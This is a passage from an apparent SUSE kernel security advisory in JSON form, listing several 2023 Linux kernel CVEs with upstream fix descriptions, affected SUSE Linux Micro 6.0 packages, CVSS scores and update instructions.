RDX: ffff93606421b028 RSI: ffffffff92ff0878 RDI: ffff93606421b010\n [552.6821] RBP: ffff93606421b000 R08: 0000000000000000 R09: ffffa168c0d07c20\n [552.6821] R10: 0000000000000000 R11: ffff93608dc52950 R12: ffffa168c0527e70\n [552.6821] R13: ffff93606421b000 R14: ffff93604a3eb420 R15: ffff93606421b028\n [552.6821] FS: 0000000000000000(0000) GS:ffff93675fb00000(0000) knlGS:0000000000000000\n [552.6821] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n [552.6821] CR2: 0000558ad262b000 CR3: 000000014feda005 CR4: 0000000000370ee0\n [552.6822] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n [552.6822] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n [552.6822] Call Trace:\n [552.6822] \u003cTASK\u003e\n [552.6822] ? __warn+0x80/0x130\n [552.6822] ? btrfs_put_transaction+0x123/0x130 [btrfs]\n [552.6824] ? report_bug+0x1f4/0x200\n [552.6824] ? handle_bug+0x42/0x70\n [552.6824] ? exc_invalid_op+0x14/0x70\n [552.6824] ? asm_exc_invalid_op+0x16/0x20\n [552.6824] ? btrfs_put_transaction+0x123/0x130 [btrfs]\n [552.6826] btrfs_cleanup_transaction+0xe7/0x5e0 [btrfs]\n [552.6828] ? _raw_spin_unlock_irqrestore+0x23/0x40\n [552.6828] ? try_to_wake_up+0x94/0x5e0\n [552.6828] ? __pfx_process_timeout+0x10/0x10\n [552.6828] transaction_kthread+0x103/0x1d0 [btrfs]\n [552.6830] ? __pfx_transaction_kthread+0x10/0x10 [btrfs]\n [552.6832] kthread+0xee/0x120\n [552.6832] ? __pfx_kthread+0x10/0x10\n [552.6832] ret_from_fork+0x29/0x50\n [552.6832] \u003c/TASK\u003e\n [552.6832] ---[ end trace 0000000000000000 ]---\n\nThis corresponds to this line of code:\n\n void btrfs_put_transaction(struct btrfs_transaction *transaction)\n {\n (...)\n WARN_ON(!RB_EMPTY_ROOT(\n \u0026transaction-\u003edelayed_refs.dirty_extent_root));\n (...)\n }\n\nThe warning happens because btrfs_qgroup_destroy_extent_records(), called\nin the transaction abort path, we free all entries from the rbtree\n\"dirty_extent_root\" with rbtree_postorder_for_each_entry_safe(), but we\ndon\u0027t actually empty the rbtree - it\u0027s still pointing to nodes that were\nfreed.\n\nSo set the rbtree\u0027s root node to NULL to avoid this warning (assign\nRB_ROOT).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53865",
"url": "https://www.suse.com/security/cve/CVE-2023-53865"
},
{
"category": "external",
"summary": "SUSE Bug 1254762 for CVE-2023-53865",
"url": "https://bugzilla.suse.com/1254762"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53865"
},
{
"cve": "CVE-2023-53989",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53989"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\narm64: mm: fix VA-range sanity check\n\nBoth create_mapping_noalloc() and update_mapping_prot() sanity-check\ntheir \u0027virt\u0027 parameter, but the check itself doesn\u0027t make much sense.\nThe condition used today appears to be a historical accident.\n\nThe sanity-check condition:\n\n\tif ((virt \u003e= PAGE_END) \u0026\u0026 (virt \u003c VMALLOC_START)) {\n\t\t[ ... warning here ... ]\n\t\treturn;\n\t}\n\n... can only be true for the KASAN shadow region or the module region,\nand there\u0027s no reason to exclude these specifically for creating and\nupdateing mappings.\n\nWhen arm64 support was first upstreamed in commit:\n\n c1cc1552616d0f35 (\"arm64: MMU initialisation\")\n\n... the condition was:\n\n\tif (virt \u003c VMALLOC_START) {\n\t\t[ ... warning here ... ]\n\t\treturn;\n\t}\n\nAt the time, VMALLOC_START was the lowest kernel address, and this was\nchecking whether \u0027virt\u0027 would be translated via TTBR1.\n\nSubsequently in commit:\n\n 14c127c957c1c607 (\"arm64: mm: Flip kernel VA space\")\n\n... the condition was changed to:\n\n\tif ((virt \u003e= VA_START) \u0026\u0026 (virt \u003c VMALLOC_START)) {\n\t\t[ ... warning here ... ]\n\t\treturn;\n\t}\n\nThis appear to have been a thinko. The commit moved the linear map to\nthe bottom of the kernel address space, with VMALLOC_START being at the\nhalfway point. The old condition would warn for changes to the linear\nmap below this, and at the time VA_START was the end of the linear map.\n\nSubsequently we cleaned up the naming of VA_START in commit:\n\n 77ad4ce69321abbe (\"arm64: memory: rename VA_START to PAGE_END\")\n\n... keeping the erroneous condition as:\n\n\tif ((virt \u003e= PAGE_END) \u0026\u0026 (virt \u003c VMALLOC_START)) {\n\t\t[ ... warning here ... ]\n\t\treturn;\n\t}\n\nCorrect the condition to check against the start of the TTBR1 address\nspace, which is currently PAGE_OFFSET. This simplifies the logic, and\nmore clearly matches the \"outside kernel range\" message in the warning.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53989",
"url": "https://www.suse.com/security/cve/CVE-2023-53989"
},
{
"category": "external",
"summary": "SUSE Bug 1256302 for CVE-2023-53989",
"url": "https://bugzilla.suse.com/1256302"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53989"
},
{
"cve": "CVE-2023-53992",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53992"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: cfg80211: ocb: don\u0027t leave if not joined\n\nIf there\u0027s no OCB state, don\u0027t ask the driver/mac80211 to\nleave, since that\u0027s just confusing. Since set/clear the\nchandef state, that\u0027s a simple check.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53992",
"url": "https://www.suse.com/security/cve/CVE-2023-53992"
},
{
"category": "external",
"summary": "SUSE Bug 1256058 for CVE-2023-53992",
"url": "https://bugzilla.suse.com/1256058"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53992"
},
{
"cve": "CVE-2023-53994",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53994"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nionic: remove WARN_ON to prevent panic_on_warn\n\nRemove unnecessary early code development check and the WARN_ON\nthat it uses. The irq alloc and free paths have long been\ncleaned up and this check shouldn\u0027t have stuck around so long.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53994",
"url": "https://www.suse.com/security/cve/CVE-2023-53994"
},
{
"category": "external",
"summary": "SUSE Bug 1255570 for CVE-2023-53994",
"url": "https://bugzilla.suse.com/1255570"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53994"
},
{
"cve": "CVE-2023-53995",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53995"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ipv4: fix one memleak in __inet_del_ifa()\n\nI got the below warning when do fuzzing test:\nunregister_netdevice: waiting for bond0 to become free. Usage count = 2\n\nIt can be repoduced via:\n\nip link add bond0 type bond\nsysctl -w net.ipv4.conf.bond0.promote_secondaries=1\nip addr add 4.117.174.103/0 scope 0x40 dev bond0\nip addr add 192.168.100.111/255.255.255.254 scope 0 dev bond0\nip addr add 0.0.0.4/0 scope 0x40 secondary dev bond0\nip addr del 4.117.174.103/0 scope 0x40 dev bond0\nip link delete bond0 type bond\n\nIn this reproduction test case, an incorrect \u0027last_prim\u0027 is found in\n__inet_del_ifa(), as a result, the secondary address(0.0.0.4/0 scope 0x40)\nis lost. The memory of the secondary address is leaked and the reference of\nin_device and net_device is leaked.\n\nFix this problem:\nLook for \u0027last_prim\u0027 starting at location of the deleted IP and inserting\nthe promoted IP into the location of \u0027last_prim\u0027.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53995",
"url": "https://www.suse.com/security/cve/CVE-2023-53995"
},
{
"category": "external",
"summary": "SUSE Bug 1255616 for CVE-2023-53995",
"url": "https://bugzilla.suse.com/1255616"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53995"
},
{
"cve": "CVE-2023-53996",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53996"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/sev: Make enc_dec_hypercall() accept a size instead of npages\n\nenc_dec_hypercall() accepted a page count instead of a size, which\nforced its callers to round up. As a result, non-page aligned\nvaddrs caused pages to be spuriously marked as decrypted via the\nencryption status hypercall, which in turn caused consistent\ncorruption of pages during live migration. Live migration requires\naccurate encryption status information to avoid migrating pages\nfrom the wrong perspective.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53996",
"url": "https://www.suse.com/security/cve/CVE-2023-53996"
},
{
"category": "external",
"summary": "SUSE Bug 1255618 for CVE-2023-53996",
"url": "https://bugzilla.suse.com/1255618"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53996"
},
{
"cve": "CVE-2023-53997",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53997"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nthermal: of: fix double-free on unregistration\n\nSince commit 3d439b1a2ad3 (\"thermal/core: Alloc-copy-free the thermal\nzone parameters structure\"), thermal_zone_device_register() allocates\na copy of the tzp argument and frees it when unregistering, so\nthermal_of_zone_register() now ends up leaking its original tzp and\ndouble-freeing the tzp copy. Fix this by locating tzp on stack instead.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53997",
"url": "https://www.suse.com/security/cve/CVE-2023-53997"
},
{
"category": "external",
"summary": "SUSE Bug 1255632 for CVE-2023-53997",
